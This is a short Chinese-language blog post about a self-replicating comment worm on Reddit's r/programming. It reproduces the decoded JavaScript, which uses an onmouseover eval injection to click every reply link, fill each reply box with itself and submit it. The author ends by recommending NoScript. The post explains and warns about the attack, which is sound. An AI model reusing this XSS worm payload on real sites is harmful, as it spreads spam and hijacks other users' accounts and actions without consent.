刚才逛 r/programming，看到有人反应有个评论在不断地复制自己，不停的回复。在 firefox 里头，只要鼠标移到那段评论上面，就会寻找所有“回复”按钮，然后点击，然后在出来的所有 textarea 框里头填入自身，然后提交所有的回复。

这个神奇的评论（打开之后不要把鼠标移到正文上）实际代码是 URL 编码掉的，翻译过来就是：

nonsense = "[x][b]\n[b]:/[" + this.innerHTML + "](/onmouseover=eval(unescape(this.innerHTML))//)";

elements = document.getElementsByTagName('a');
for (i = 0; i < elements.length; i++) {
    if (elements[i].innerHTML == 'reply') {
        $(elements[i]).click();
    }
}

elements = document.getElementsByTagName('textarea');

for (i = 0; i < elements.length; i++)
    elements[i].value = nonsense;

elements = document.getElementsByTagName('button');
for (i = 0; i < elements.length; i++) {
    if (elements[i].innerHTML     == 'save'
    &&  elements[i].style.display != 'none') {
        $(elements[i]).click();
    }
}

虽然我支持富网络应用（RIA），但是有的时候戴个安全套帽似乎很有必要啊。firefox 用户建议安装 noscript。